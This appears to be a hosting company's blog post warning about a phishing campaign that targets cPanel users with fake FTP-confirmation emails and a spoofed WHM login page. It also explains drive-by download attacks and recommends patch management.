Brian Krebs at The Washington Post is reporting that scam artists have launched a massive email attack to trick cPanel users into giving up their access details. Major providers such as HostGator, Yahoo, and 50Webs as well as some 90 other hosting providers have been targeted. Security experts report that the attackers are attempting to build a bot net to further distribute malicious code. A few of our cPanel server management clients have been targeted, but we have their systems locked down.
Gary Warner, director of research in computer forensics at the University of Alabama, Birmingham, has collected several of these web host targeted emails. They all carry a similar message asking you to confirm your FTP login details due to system maintenance.
Due to the system maintenance, we kindly ask you to take a few minutes to confirm your FTP details. Please confirm your FTP details by using the link below:
When the link is followed, they take you to an attacker controlled web site designed to spoof a WHM login.
After entering your details, the attackers now have your login and can use it to compromise your account.
Earlier this year, we investigated several FTP-based attacks against web sites. In those attacks, a end-users FTP details were stolen by viruses on their desktop computer systems. The attackers then used the FTP credentials to place scripts into the web sites. These drive-by web attacks reach epidemic proportions this summer. A drive-by web attack is where an attacker inserts redirects or other code into a site such that just by visiting it the exploit is triggered. If you lack anti-malware tools or have not patched your system, then your desktop computer may be exploited.
The consequences of this exploits is that your site can get flagged by Google or others as being dangerous. As a result, visitors will see a warning page before continuing to your site. I’ve written before about how to remove the “this site may harm your computer warning” once you clean up the underlying issues.
In a white paper, Drive-by Downloads. The Web Under Siege, Ryan Naraine outlines the method of the attack and how it as been spreading. His conclusion was nothing unfamiliar: use a patch management solution that assists with finding and fixing all software on your system. Secunia offers a tool called Personal Software Inspector which can do just this.